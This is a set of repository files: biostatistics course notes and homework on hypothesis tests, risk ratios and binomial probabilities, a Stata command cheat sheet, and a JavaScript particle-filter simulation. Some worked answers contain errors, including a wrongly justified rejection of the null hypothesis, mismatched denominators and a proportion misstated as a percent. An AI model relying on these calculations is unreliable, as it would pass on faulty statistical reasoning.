What is the p-value corresponding to this two-sided hypothesis test?\n\nHypotheses | \n-------------- | \nH_0: μ = 108 | \nH_A: μ != 108 | \n\n> μ_0= 108 mg/ml \n> σ= 12.5\n> n= 25\n> xˉ= mean hemoglobin levels= 103\n\n> z*= (x⁻ - μ_0) / (σ/SQRT(n))= (103 - 108) / (12.5/sqrt(25))= -2\n\n> => **-2 is less than 1.96** \n> => So we reject the null hypothesis\n\nTest statistic \n> => **-2**\n\np-value \n> 2*normal( -2 )\n> => **0.04550026**\n> => \n\n2. In a sample of size 25, what is the value of the test statistic for testing whether the mean hemoglobin level in the population is equal to 108 g/L versus the alternative that it **is less** than 108 g/L, when xˉ=103. What is the p-value corresponding to this one-sided test? \n\n> n= 25\n> μ_0= 108 mg/ml \n\nHypotheses | \n-------------- | \nH_0: μ = 108 | \nH_A: μ < 108 | \n\n> z*= (x⁻ - μ_0) / (σ/SQRT(n))= (103 - 108) / (12.5/sqrt(25))= -2\n\n> => **-2 is less than 1.96** \n> => So we reject the null hypothesis\n\nTest statistic \n> => **-2**\n\np-value \n> normal( -2 )\n> => **0.02275013**\n\n\n3. In a sample of size 25, what is the value of the test statistic for testing whether the mean hemoglobin level in the population is equal to 108 g/L versus the alternative that it **is greater** than 108 g/L, when xˉ=103. What is the p-value corresponding to this one-sided test? 
\n\n> n= 25\n> μ_0= 108 mg/ml \n\nHypotheses | \n-------------- | \nH_0: μ = 108 | \nH_A: μ > 108 | \n\n> z*= (x⁻ - μ_0) / (σ/SQRT(n))= (103 - 108) / (12.5/sqrt(25))= -2\n\nTest statistic \n> => **-2**\n\np-value p=P(Z>Z*)\n> normal( 2 )\n> => **0.97724987**\n\n" }, { "alpha_fraction": 0.4455571174621582, "alphanum_fraction": 0.5776397585868835, "avg_line_length": 40.95212936401367, "blob_id": "f90614579a1051a02651c934058d6b1bb985251b", "content_id": "11cae9db5b7e44224f5c3fbd607f3b0c5e27d057", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7889, "license_type": "no_license", "max_line_length": 217, "num_lines": 188, "path": "/PH207x/excercises/Lesson4/Measures of Association/Binary Exposure and Binary Outcome.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Binary Exposure and Binary Outcome\n| Exposure | Outcome + | Outcome - | Total | Estimated Risk\n-----------------------------------------------------------\n| E+ | A | B | N_1 | A/N_1\n| E- | C | D | N_0 | C/N_0\n\n## Example with Smokers (SMK)\n| Exposure | Outcome + | Outcome - | Total | Estimated Risk\n| | e.g. Death| e.g. 
Survive| | \n------------------------------------------------------------\n| E+ (SMK) | A | B | N_1 | A/N_1\n| E- (N-SMK)| C | D | N_0 | C/N_0\n\n## Common Measures of Association\nRisk Ratio: RR=R_1/R_0\nRisk Difference (Attributable Risk): RD= R_1-R_0\nDisease Odds Ratio: OR= (R_1/(1-R_1)) / (R_0/(1-R_0))\nOdds= Risk/(1-Risk)\n\n## Example Cumulative Incidence Data\n| | Headache | No Headache | Total | Estimated Risk\n------------------------------------------------------------\n| Male | 10 | 40 | 50 | 10/50= .20\n| Females| 5 | 45 | 50 | 5/50= .10\n\nRisk Ratio: RR= (10/50) / (5/50)= .20/.10= 2.0\nRisk Difference = .20 - .10= .10\n\n## Example Incidence Rate Data\n| | Headache | Person-Days of Follow-up | Incidence Rate\n------------------------------------------------------------\n| Male | 10 | 302 | 10/302pd\n| Females| 5 | 343 | 5/343pd\n\nRisk Ratio: RR= (10/302pd) / (5/343pd)= .20/.10= 2.27\nRisk Difference = (10/302pd) - (5/343pd)= 1.85/100pd\n\n# Odds\n## Example Odds - Cumulative Incidence Data\n| | Headache | No Headache | Total | Disease Odds | Non-Disease Odds\n------------------------------------------------------------\n| Male | 10 | 40 | 50 | 10/40= 0.25 | 40/10=4\n| Females| 5 | 45 | 50 | 5/45= 0.11 | 45/5= 9\n\nOdds Ratio= (10/40) / (5/45) = 2.25\nOdds Ratio_2 for not developing outcome= 1/(Odds Ratio for developing outcome)\nOdds Ratio_2= (40/10)/(45/5)= .4444= 1/2.25\n\n## Illness Odds Ratio= Exposure Odds Ratio\n| | Headache | No Headache | Disease Odds\n------------------------------------------------------------\n| Male | 10 | 40 | 10/40= 0.25\n| Females| 5 | 45 | 5/45= 0.11\n| Exposure Odds | 10/5 | 40/45 | EOR= (12/5) / (40/45)\n\n=> For small risks OR ~ RR\n\n# Measures of Association Problem 1 \n| | Died | Survived | Total | Estimated Risk | Disease Odds\n------------------------------------------------------------\n| Male | 843 | 1101 | 1944 | 843/1944=0.43364198 | 843/1101= 0.765667574932\n| Females| 707 | 1783 | 2490 | 
707/2490=0.28393574 | 707/1783= 0.396522714526\n\nQ1.) What is the 24 year Risk Ratio for dying comparing Males (exposed group) to Females (non-exposed group)?\nRisk Ratio: RR= 0.43364198 / 0.28393574= 1.5272539\ndi ( 0.43364198 / 0.28393574 )\n=> \n\nQ2.) What is the 24-year Risk Difference for dying, comparing Males (exposed group) to Females (non-exposed group)?\nRisk Difference = 0.43364198 - 0.28393574= 0.14970624\n\nQ3.) What is the 24-year Odds Ratio for dying, comparing Males (exposed group) to Females (non-exposed group)?\nOdds Ratio= (843/1101) / (707/1783)\ndi ( (843/1101) / (707/1783) )\n=> 1.930955143\n\n\n# Measures of Association Problem 2 \n| | Died | Person-Years of Follow-up | Incidence Rate\n------------------------------------------------------------\n| Male | 843 | 38,287.33 | 842/38,287.33= 0.02199161\n| Females| 707 | 52,828.15 | 707/52,828.15= 0.01338302\n\nRate Ratio: RR= 0.02199161 / 0.01338302= 1.6432472\nRisk Difference = 0.02199161 - 0.01338302= 0.00860859\n\nQ1.) What is the 24-year Rate Ratio for dying, comparing Males (exposed group) to Females (non-exposed group)?\nRate Ratio: RR= 0.02199161 / 0.01338302= 1.6432472\n\nQ2.) What is the 24-year Rate Difference for dying, comparing Males (exposed group) to Females (non-exposed group)? Please express your answer in units of 100 person-years. 
\nRisk Difference = 100*(0.02199161 - 0.01338302)= 0.00860859*100= 0.860859\n\n# Measures of Association AP%\n## Attributable Proportion Among Exposed Subjects\n\n * Attributable Risk Percent Among Exposed Subjects\n * Attributable Fraction Among Exposed Subjects (Stata) - What they're asking is how much of a person's risk, if a smoker, is due to the fact that they smoke?\n * Proportion of Exposed Subject's Risk that is \"attributed\" to the Exposure\n\n\t\t\t\t\tR_Exposed (total risk)\nR_Exposed-R_Non-Exposed (risk difference)\tR_Non-Exposed (Baseline Risk)\n\nAP%= (RR-1)/RR\n\n## Attributable Proportion Among Total Population\nAP%_Population= p(RR-1)/(1+p(RR-1))\n\n\n## 24-Year Risk of Death Among Smokers and Non-Smokers\n| | Died | Survived | Total | Estimated Risk\n---------------------------------------------------------\n| Smokers | 788 | 1393 | 2181 | 788/2181=0.36 \n| Non-Smokers | 762 | 1491 | 2253 | 762/2253=0.34\n| Total | 1550 | 2884 | 4434 | 1550/4434= 0.35\n\n-> Attributable Proportion Among Exposed Subjects\nRisk Ratio: RR= 0.36 / 0.34= 1.07\nAP%_Exposed= (1.07-1)/1.07= 0.065\n\n-> Attributable Proportion Among Total Population\np= prevelance of exposure in population= P(Smokers)= 2181/4434= 0.49\nAP%_Population= 0.49*(1.07-1) / (1+0.49*(1.07-1))= 0.033\n\nWe come up with an answer of 0.033%. Meaning of the 3% between 3% and 4% of the average risk of dying in the entire population can be attributed to the fact that roughly half the people in the population were smoking.\n\n\n# Measures of Association NNT\n## Example: Rosuvastatin to Prevent Mortality in Subjects with Elevated C-Reactive Protein\n| Treatment | Deaths | Number of Subjects | Estimated Risk\n---------------------------------------------------------\n| Rosuvastatin| 198 | 8901 | 0.0222\n| Placebo | 247 | 8901 | 0.0277\n\nQ1.) Suppose 10000 subjects were treated with Rosuvastatin:\nExpected Number of Deaths= 10000*0.0222= 222\n\nQ2.) 
Suppose 10000 subjects were treated with Placebo:\nExpected Number of Deaths= 10000*0.0277= 277\n\n=> Implications: 277-222= 55 deaths prevent for every 10000 treated subjects\n=> Death prevented for every 181.8 (10000/55) treated subjects\n\n## Number Needed to Treat (NNT)\nNNT= Number of subjects needed to treat to prevent 1 outcome\n\nExample: 181.8 treated with Rosuvastatin would prevent 1 deaths\n181.8\t= 1/(Risk_Placebo - Risk_Treatment)= 1/(Risk_Difference)\n\t= 1/(0.0277-0.0222)= 1/(55/10000)= 181.8\n\n\n# Measures of Association Reg Coeff \nWhat is probably the most commonly used measure of association to link a risk\nfactor to an outcome.\n\n## 24-Year Risk of Death by Packs of Cigarettes Smoked (FHS)\n| Packs1 | Died | Survived | Total | Estimated Risk\n----------------------------------------------------\n| 0 | 762 | 1491 | 2253 | 762/2253= 0.34\n| 1 ( 1-20) | 573 | 1098 | 1671 | 573/1671= 0.34\n| 2 (21-40) | 169 | 229 | 398 | 169/298= 0.43\n| 3 (>40) | 36 | 44 | 80 | 36/80= .45\n\n### Regression Model Equation:\nRisk= B_0 + B_1(#Packs1)\n\n### Slope (B_1): Estimate of the Effect of Smoking\nB_1= (delta in Risk)/(Smoking 1 additional pack)\n\n## 24-Year Risk of Death by Packs of Cigarettes Smoked (FHS)\n| Packs1 | Died | Survived | Total | Log(Odds) or (Logit)\n----------------------------------------------------\n| 0 | 762 | 1491 | 2253 | Log(762/1491)= -0.67\n| 1 ( 1-20) | 573 | 1098 | 1671 | Log(573/1098)= -0.65\n| 2 (21-40) | 169 | 229 | 398 | Log(169/229)= -0.30\n| 3 (>40) | 36 | 44 | 80 | Log(36/44)= -0.20\n\nLog(Odds)= ln(Odds)= natural log of the Odds of Death\n\n### Regression Model Equation:\nLog(Odds)= B_0 + B_1(#Packs1)\n\n### Slope (B_1): Estimate of the Effect of Smoking\nB_1= (delta in Log(Odds))/(Smoking 1 additional pack)= log( Odds Ratio )\n\n## Implications\n * Regression coefficients = slopes\n * Measures of Association\n * Regression coefficient from logistic regression model is a log(Odds Ratio)\n\n\n" }, { "alpha_fraction": 
0.5237127542495728, "alphanum_fraction": 0.6470189690589905, "avg_line_length": 30.70967674255371, "blob_id": "18e12eefda5663c6bbe5015793d31b23ffac35d5", "content_id": "9f5260c15cb22f4862fb891e177f41de0625fedc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2952, "license_type": "no_license", "max_line_length": 272, "num_lines": 93, "path": "/PH207x/homework/four/Lung cancer and the binomial distribution.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Lung cancer and the binomial distribution\n\nRecall: According to data from the CDC in 2010, 19.3% of adults age eighteen and older smoke cigarettes. In the year 2008, the incidence rate of lung cancer was 65.1 cases per 100,000 people per year.\n\nSuppose you are conducting a lung cancer study in the United States, and you obtain a random sample of 2,000 adults (over 18 years of age) who do not have lung cancer. You plan to follow this study cohort over a period of 5 years and observe incident cases of lung cancer.\n\nLung cancer and the binomial distribution. You also need to carefully consider how many cases of lung cancer you expect to observe in your study over time. We first model the number of lung cancer cases observed in the first year using the binomial distribution.\n\n- 2010: 19.3% of >18 years smoke cigarettes\n- p= 0.193\n- n= 2000 have no lung cancer\n- observation 5 years\n- 2008: incidence rate of lung cancer was 65.1 cases per 100,000 people per year -> = 0.0000655\n\n##### Q1. What proportion of the study population would you expect, on average, to be diagnosed with lung cancer in the first year? 
#####\n\t \n>\t=> Prevalence Proportion is the total number of persons with lung cancer \n>\n>\tp= prevalence = incidence * duration= 65.1/100000 * 1= 0.000651 \n>\tn= sample size= 2000 \n>\tsd(X)= standard deviation= SQRT( n*p*(1-p) )= SQRT( 2000*65.1/100000*(1-65.1/100000) )= 1.1406806731 \n>\n>\tproportion= prevalence / duration= 65.1/100000 / 1= **0.000651**\n\n* * *\n\n##### Q2. How many cases of lung cancer would we expect to observe in the first year? #####\n*Hint1: The expected value E(x) of a binomial distribution can be with decimals, but the actual number of alive people can only be a whole number (0, 1, 2, 3...).* \n\t \n>\tp= 65.1/100000 \n>\tn= 2000 \n>\tE(x)= n*p= 65.1/100000*2000 \n\n\tdi 65.1/100000*2000 \n\n>\t=> E(x)= **1.302**\n\n* * *\n\n##### Q3. Why would you expect the mean and variance to be similar in this example? #####\n- **the event is rare**\n- the mean is close to 1 \n- we are dealing with incidence rates \n- both (a) and (b)\n\n* * *\n\n##### Q4. What is the probability that you observe more than 1 lung cancer case in the first year? #####\n\n>\tP(X>1)= ?\n\n>\tk=1 \n>\tn=2000 \n>\tp=0.00065 \n\n>\tP(X>1)= P(X>=1)-P(X=1)\n>\tP(X>1)= binomialtail(2000,1,0.00065)-binomialp(2000,1,0.00065)\n\n\tdi binomialtail(2000,1,0.00065)-binomialp(2000,1,0.00065)\n\n>\t=> P(X>1)= **0.37321143**\n\n* * *\n\n##### Q5. What is the probability that you observe no lung cancer cases in the first year? 
#####\n\n>\tP(X=0)= ?\n\n>\tk=0\n>\tn=2000\n>\tp=0.00065\n\n>\tP(X=0)= binomialp(2000,0,0.00065)\n\n\tdi binomialp(2000,0,0.00065)\n\n>\t=> **0.27241662**\n\n###### Table in Stata ######\n\n\tclear all\n\tset obs 5\n\tgen x=_n-1\n\tgen p = binomialp(2000,x,0.00065)\n\tlist x p\n\n> x | p\n> ------------- | -------------\n> 0 | 0.2724166\n> 1 | 0.354372\n> 2 | 0.2303763\n> 3 | 0.0997948\n> 4 | 0.0324057\n\n\n\n" }, { "alpha_fraction": 0.5591859817504883, "alphanum_fraction": 0.5710570812225342, "avg_line_length": 29.71180534362793, "blob_id": "578138bcfad55d630f1ccd6db7c23eec677d555b", "content_id": "f9ada3e7c0d03ef9ece1864fbc088f5a14007e53", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8845, "license_type": "no_license", "max_line_length": 99, "num_lines": 288, "path": "/AI-Class/Algorithms-JS/ParticleFilter/js/map_filter.js", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "/* depends on particlefilter.js being loaded first */\n\n// modified from makeClass - By John Resig (MIT Licensed)\nfunction makeClass(){\n return function(args){\n if ( this instanceof arguments.callee ) {\n if ( typeof this.init == \"function\" )\n this.init.apply( this, args.callee ? 
args : arguments );\n } else\n throw \"You must instantiate this class with 'new <classname>()', not '<classname>()'\";\n };\n}\n\nMapFilter = (function() {\n\nMapFilter = makeClass();\n\nvar that;\n\nMapFilter.prototype.init = function(map, nparticles, p_random_measurement) {\n this.map = this.arraymap(map);\n\n this.nrows = this.map.length;\n this.ncols = this.map[0].length;\n\n //depends on nrows and ncols\n this.particles = this.makeparticles(nparticles);\n\n //a float 0 < n < 1 representing the probability of returning a random measurement\n this.p_random_measurement = p_random_measurement || .1;\n\n\n //now run the particle filter given the initial measurement we've made\n that = this;\n\n try {\n var botloc = this.findbot(this.map);\n } catch (err) {\n //there's no bot in the maze, just return the mapfilter without sensing\n //or updating the particles\n return;\n }\n\n //save the most recent measurement\n this.last_measurement = this.sense(botloc);\n \n //and the actual state\n this.actual_measurement = this.omniscent_sense(botloc);\n\n this.particles = ParticleFilter(this.particles,\n moveparticle,\n \"none\",\n this.newweight,\n this.last_measurement);\n};\n\n//turn a map from a string into an array\nMapFilter.prototype.arraymap = function(maps) {\n var maplines = maps.split(\"\\n\");\n var map = [];\n\n for (var i=0; i < maplines.length; i++) {\n map.push(maplines[i].split(\"\"));\n }\n\n return map;\n};\n\nMapFilter.prototype.makeparticles = function(n) {\n var particles = [];\n var weights = [];\n var x = 0;\n var y = 0;\n\n for (var i=0; i < n; i++) {\n row = Math.floor(Math.random() * this.nrows);\n col = Math.floor(Math.random() * this.ncols);\n while (this.map[row][col] != \"_\" && this.map[row][col] != 'o') {\n row = Math.floor(Math.random() * this.nrows);\n col = Math.floor(Math.random() * this.ncols);\n }\n particles.push([row, col]);\n weights.push(1/n);\n }\n\n return [particles, weights];\n};\n\nMapFilter.prototype.findbot = function() {\n 
for (var i=0; i < this.map.length; i++) {\n for (var j=0; j < this.map[0].length; j++) {\n if (this.map[i][j] == \"o\") {\n return [i,j];\n }\n }\n }\n\n throw \"no bot found\";\n};\n\nMapFilter.prototype.getmove = function(direction) {\n //this is a special move, only called so that we can update the particle\n //filter at the initial sense of the robot\n if (direction === \"none\") { return \"none\"; }\n\n var move = Math.random();\n var moves = {\n \"up\": [\"left\", \"right\"],\n \"left\": [\"up\", \"down\"],\n \"down\": [\"right\", \"left\"],\n \"right\": [\"down\", \"up\"]\n };\n\n //80% chance bot moves where you want. Otherwise, you fail by 90 degrees\n if (move > .8) {\n direction = moves[direction][move > .9 ? 0 : 1];\n }\n\n return direction;\n};\n\nMapFilter.prototype.movebot = function(direction) {\n var move = this.getmove(direction);\n\n var botloc = this.findbot(this.map);\n var row = botloc[0];\n var col = botloc[1];\n\n console.log(\"moving bot: \" + move);\n\n if (move == \"up\") { botloc = this.movecoords(row, col, row-1, col); }\n if (move == \"left\") { botloc = this.movecoords(row, col, row, col-1); }\n if (move == \"down\") { botloc = this.movecoords(row, col, row+1, col); }\n if (move == \"right\") { botloc = this.movecoords(row, col, row, col+1); }\n\n if (botloc[0] != row || botloc[1] != col) {\n this.map[row][col] = '_';\n this.map[botloc[0]][botloc[1]] = 'o';\n }\n\n //our bot can sense if there is a wall to the north, south, east or west\n var measurement = this.sense(botloc);\n\n //save the bot + correct measurement so we can display it from the UI\n this.last_measurement = measurement;\n this.actual_measurement = this.omniscent_sense(botloc);\n\n console.log(\"mesaurement: \"+ measurement);\n\n this.particles = ParticleFilter(this.particles,\n moveparticle,\n direction,\n this.newweight,\n measurement);\n};\n\nMapFilter.prototype.omniscent_sense = function(botloc) {\n var row = botloc[0];\n var col = botloc[1];\n\n //an array of 4 
integers. 1 represents a wall, 0 represents no wall.\n //ordered north, west, south, east.\n return [\n this.omniscent_iswall(row-1, col),\n this.omniscent_iswall(row, col-1),\n this.omniscent_iswall(row+1, col),\n this.omniscent_iswall(row, col+1)\n ];\n};\n\nMapFilter.prototype.omniscent_iswall = function(row, col) {\n //otherwise, return 1 if [row, col] is a wall\n if (row < 0 || row > this.nrows-1 ||\n col < 0 || col > this.ncols-1 ||\n this.map[row][col] == 'X') {\n return 1;\n }\n return 0;\n}\n\nMapFilter.prototype.sense = function(botloc) {\n var row = botloc[0];\n var col = botloc[1];\n\n //an array of 4 integers. 1 represents a wall, 0 represents no wall.\n //ordered north, west, south, east.\n return [\n this.iswall(row-1, col),\n this.iswall(row, col-1),\n this.iswall(row+1, col),\n this.iswall(row, col+1)\n ];\n};\n\nMapFilter.prototype.iswall = function(row, col) {\n var r = Math.random();\n \n //p_random_measurement% of the time, return a random measurement\n if (r < this.p_random_measurement) {\n return Math.floor(r*100) % 2;\n }\n\n //otherwise, return 1 if [row, col] is a wall\n if (row < 0 || row > this.nrows-1 ||\n col < 0 || col > this.ncols-1 ||\n this.map[row][col] == 'X') {\n return 1;\n }\n return 0;\n};\n\n//try to move from [row, col] to [newrow, newcol]. If [newrow, newcol] is not a\n//valid square, return [row, col]\nMapFilter.prototype.movecoords = function(row, col, newrow, newcol) {\n if (newrow < 0 || newrow > this.nrows-1 ||\n newcol < 0 || newcol > this.ncols-1 ||\n this.map[newrow][newcol] == 'X') {\n return [row, col];\n }\n return [newrow, newcol];\n};\n\n\nMapFilter.prototype.find_walls = function(row, col) {\n var walls = [];\n\n walls.push(row > 0 && this.map[row-1][col] != 'X' ? 0 : 1);\n walls.push(col > 0 && this.map[row][col-1] != 'X' ? 0 : 1);\n walls.push(row < this.nrows-1 && this.map[row+1][col] != 'X' ? 0 : 1);\n walls.push(col < this.ncols-1 && this.map[row][col+1] != 'X' ? 
0 : 1);\n\n return walls;\n};\n\nvar moveparticle = function(particle, direction) {\n var row = particle[0];\n var col = particle[1];\n\n var move = that.getmove(direction);\n\n if (move == \"up\") { return that.movecoords(row, col, row-1, col); }\n if (move == \"left\") { return that.movecoords(row, col, row, col-1); }\n if (move == \"down\") { return that.movecoords(row, col, row+1, col); }\n if (move == \"right\") { return that.movecoords(row, col, row, col+1); }\n if (move == \"none\") { return [row, col]; }\n\n throw \"we should never get here: <\" + move + \">\";\n};\n\n\n//Given the particle, return the likelihood of the given measurement\nMapFilter.prototype.newweight = function(particle, measurement) {\n var row = particle[0];\n var col = particle[1];\n\n var p_random = that.p_random_measurement;\n\n //P(wall measurement|wall) = P(~random) + P(random)/2\n //= the probability of a correct measurement plus the probability of a\n //randomly correct measurement\n var p_wallm_wall = (1 - p_random) + (p_random / 2);\n\n //P(wall measurement|no wall) = P(random)/2\n //= the probability of a randomly incorrect measurement\n var p_wallm_nowall = p_random / 2;\n\n var probabilities = [];\n\n var walls = that.find_walls(row, col);\n\n for (var i=0; i < measurement.length; i++) {\n //if we measured wall\n if (measurement[i] == 1) {\n //push P(wall measurement|wall) if it is a wall, its complement otherwise\n probabilities.push(walls[i] == 1 ? p_wallm_wall : 1-p_wallm_wall);\n } else {\n //push P(wall measurement|no wall) if it is a wall, its complement otherwise\n probabilities.push(walls[i] == 1 ? 
p_wallm_nowall : 1-p_wallm_nowall);\n }\n }\n\n //return the product; the probabilities are all conditionally independent.\n return probabilities.reduce(function(a,b) { return a*b; });\n};\n\nreturn MapFilter;\n\n})();\n" }, { "alpha_fraction": 0.47362688183784485, "alphanum_fraction": 0.5766682028770447, "avg_line_length": 29.935392379760742, "blob_id": "97f25432766f6b74fe10082f0d819cc8317a0dae", "content_id": "739380da5c60b666b9f62ba2a1b52dbccf31efe7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 11060, "license_type": "no_license", "max_line_length": 278, "num_lines": 356, "path": "/PH207x/stata/commands.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Commands in Stata\n\n## Distribution - Binomial, Poisson and Normal\n\n### Suppose X ~ Binomial(n,p) \n> binomialp(n,k,p) - returns the probability of observing k successess - P(X=k) \n> binomial(n,k,p) - returns the probability of observing k or fewer successes - P(X<=k) \n> binomialtail(n,k,p) - return the probability of observing floor(k) or more successes - P(X>=k)\n\n### Suppose X ∼ Poisson(m) \n> poissonp(m,k) - returns the probability of observing floor(k) or fewer successes - P(X=k) \n> poisson(m,k) - returns the probability of observing floor(k) or fewer successes - P(X<=k) \n> poissontail(m,k) - returns the probability of observing floor(k) or more successes - P(X>=k)\n\n### Suppose Z ~ Normal(0,1) \n> normal(z) - return the cumulative standard normal distribution - P( Z<z ) \n> normalden(z) - returns the standard normal density\n\n### Distribution Table in Stata\n\n\tclear all\n\tset obs 5\n\tgen k=_n-1\n\tgen p = binomialp(2000,k,0.00065)\n\tlist k p\n\n\n x | p \n---|-----------\n 0 | .2724166\n 1 | .354372\n 2 | .2303763\n 3 | .0997948\n 4 | .0324057\n\n\n## Sampling Distribution\n\n\tset seed 7234234234\n\tsample 49, count\n\n\tuse \"framingham_dataset.dta\"\n\tsumm death angina totchol1 sysbp1 
diabp1 bmi1 glucose1\n\n### Central Limit Theorem\n\n#### First Sample Set ####\n\n\tsum bmi1\n\tdrop if bmi1 == .\n\tkeep bmi1\n\tpreserve\n\tsample 20, count\n\tsummarize\n\n#### Second Sample Set ####\n\n\t. restore\n\t. preserve\n\tsample 20, count\n\tsum bmi1\n\n#### Third Sample Set ####\n\n\t. restore\n\t. preserve\n\tsample 100, count\n\tsum bmi1\n\n#### Fourth Sample Set - Check again ####\n\n\t. restore\n\t. preserve\n\tsample 100, count\n\tsum bmi1\n\n#### Compare Histograms (Continued vs. Binary) ####\n\n\tuse \"framingham_dataset.dta\"\n\t. histogram bmi1\n\t. histogram prevmi1\n\n\n## Confidence and Predictive Intervals\n\n### Example: BMI in Framingham\nX~Normal(μ, σ²)\n\n##### Q1. Construct a 95% predictive interval for X #####\n\t \n\n>\tsum bmi1\n\n Variable | Obs | Mean | Std. Dev. | Min | Max\n-------------|------------|------------|-------------|-----------|---------\n bmi1 | 4415 | 25.84616 | 4.101821 | 15.54 | 56.8\n\n> [ x⁻-1.96*σ/SQRT(n), x⁻+1.96*σ/SQRT(n), ] \n>\tdi 25.84616 \n> 25.84616\n\n>\tdi 25.84616 - 1.96*4.101821 \n>\tdi 25.84616 + 1.96*4.101821\n> [17.806591, 33.885729 ]\n\n##### Q2. Suppose we now draw repeated samples of size 100 from the Framingham cohort. What is a 95% predictive interval for the sample mean? #####\n\t \n>\tdi 25.84616 - 1.96*4.101821/sqrt(100)\n>\tdi 25.84616 + 1.96*4.101821/sqrt(100)\n> [ 25.042203, 26.650117 ]\n\n##### Q3. Take a sample of size 100. Construct a 95% configence interval for μ. 
#####\n\t \n>\tsample 100, count\n>\tsum bmi1\n\n>\tdi 25.84616 + 1.96*4.101821/sqrt(100)\n>\tdi 25.84616 - 1.96*4.101821/sqrt(100)\n> [ 25.042203, 26.650117 ]\n\n## Confidence intervals and t-distribution\n> X~Normal(μ, σ²) \n> CI= Confidence Interval\n\n### σ is known ###\n> 95% x⁻ +- Z_(1-2/2) * σ/sqrt(n)\n> Z= 0.975\n\n### σ is unknown ###\n> 95% CI x⁻ +- t_n-1,0.975 * σ/sqrt(n)\n\n> Note that if \"normal(z)=p\", then \"invnormal(p)=z\"\n\n\tset seed 2 \n\tsample 20, count \n\tsum bmi1\n\n\n> Variable | Obs | Mean | Std. Dev. | Min | Max\n> -------------|-------------|-----------|-------------|----------|---------\n> bmi1 | 20 | 25.0295 | 3.184407 | 20.19 | 32.29\n\n> *95%:* \n>\tdi 25.0295 - 1.96*3.184407 \n>\tdi 25.0295 + 1.96*3.184407 \n> => **[ 18.788062, 31.270938 ]**\n\n> *Z= 0.975* \n>\tdi 25.0295 - invnormal(0.975)*3.184407 \n>\tdi 25.0295 + invnormal(0.975)*3.184407 \n> => **[ 18.788177, 31.270823 ]**\n\n> *99%:* \n>\tdi 25.0295 - invnormal(0.995)*3.184407 \n>\tdi 25.0295 + invnormal(0.995)*3.184407 \n> => **[ 16.827011, 33.231989 ]**\n\n\n### 95% confidence interval for μ where σ is known###\n> σ is known and it is σ= 4.1 for the framingham cohort\n> invnormal(0.975) ~ 1.96\n\n\n\tset seed 2\n\tsample 20, count\n\tsum bmi1\n\n> Variable | Obs | Mean | Std. Dev. 
| Min | Max\n> -------------|-------------|-----------|-------------|----------|---------\n> bmi1 | 20 | 25.0295 | 3.184407 | 20.19 | 32.29\n\n\n>\tdi 25.029-1.96*4.1/sqrt(20) \n>\tdi 25.029+1.96*4.1/sqrt(20) \n> => **[23.232096, 26.825904]**\n\n> *97.5%:*\n>\tdi 25.029-invnormal(0.975)*4.1/sqrt(20) \n>\tdi 25.029+invnormal(0.975)*4.1/sqrt(20) \n> => **[23.232129, 26.825871]**\n\n\n### 95% for μ with invttail where σ is unknown ###\n> σ is unknown \n> x⁻ +- t_n-1 * σ/sqrt(n) \n> t-tail= 0.025 \n> n-1= 19 \n> \n>\tdi 25.029-invttail(19,0.025)*3.184407/sqrt(20) \n>\tdi 25.029+invttail(19,0.025)*3.184407/sqrt(20) \n> => **[ 23.538652, 26.519348 ]**\n\n#### Easy Stata command to calculate invttail where σ is unknown ####\n\n\tset seed 2\n\tsample 20, count\n\tsum bmi1\n\n> Variable | Obs | Mean | Std. Dev. | Min | Max\n> -------------|-------------|-----------|-------------|----------|---------\n> bmi1 | 20 | 25.0295 | 3.184407 | 20.19 | 32.29\n\n\n\tcii 20 25.0295 3.184407\n\n\n> Variable | Obs | Mean | Std. Err. | min [95% Conf. Interval] | max [95% Conf. Interval] \n> ------------|-------------|-----------|--------------|------------------------------|--------------------------\n> | 20 | 25.0295 | .7120551 | 23.53915 | 26.51985 \n\n\n#### Easy Stata command to calculate confidence intervals ####\n\n\tci bmi1\n\n> Variable | Obs | Mean | Std. Err. | min [95% Conf. Interval] | max [95% Conf. Interval] \n> ------------|-------------|-----------|--------------|------------------------------|--------------------------\n> bmi1 | 20 | 25.0295 | .712055 | 23.53915 | 26.51985 \n\n## P-values and examples ##\n> μ_0= 237 mg/ml \n> σ= 47.7 mg/100ml \n> n= 49 non-hypertensives \n> z= (x⁻ - μ_0) / (σ/SQRT(n))\n\n\tset seed 725764662\n\tdrop if hyperten==1\n\tsample 49, count\n\tmean totchol1\n\n> We could use the standard error (Std. Err.), if we are using t instead of z. Now we are using z!\n\n> | Mean | Std. Err. | min [95% Conf. Interval] | max [95% Conf. 
Interval]\n> -------------|------------- | ---------- | ------------------------- | -------------------------\n> totchol1 | 221.8776 | 4.614348 | 212.5998 | 231.1553\n> Mean estimation Number of obs = 49\n\n\tdi (221.8776-237) / (44.7/7)\n> => -2.3681611\n\n## Hypothesis Testing ##\n\n### Example: Inference about heart rates in healthy young adults ###\n> In adults over 15 years of age, a resting heart rate around 80bpm is usually considered average. Using a subset of the Framingham cohort, we are going to attempt to make inference about heart rate among \"healthy young\" adults.\"\n\n> Specifically, we restrict our analysis to adults with the following characteristics at baseline: non-smoker, younger than 40, BMI less than 25 and systolic blood pressure less than 120. There are 61 participants who meet our criteria.\n\n> **We hypothesize that heart rate at follow up would be lower than 80bpm, the resting heart rate for adults with average health.**\n\n> We are making the somewhat strong assumption that these Framingham participants are generalizable to the broader population of healthy young adults (this assumotion is necessary if we want to make inference about heart rate in healty young adults.)\n\n1. Choose a test (e.g. one-sample t-test)\n\n> Hypotheses | \n> -------------- | \n> H_0: μ = 80 | \n> H_A: μ != 80 | \n\n* One sample t-test\n* Normally distributed\n\n> Stata commands:\n\n\tuse healthyyoungadults.dta\n\thistogram heartrte2\n\thistogram heartrte2 if heartrte2 < 200\n\n\n2. State null or alternative hypothesis\n\n\n3. Do the tests\n\n> Stata commands for \"One-sample t test\":\n\n\tdb ttest\n\tttest heartrte2 == 80\n\n> Variable | Obs | Mean | Std. Err. | Std. Dev. | min [95% Conf. Interval] | max [95% Conf. 
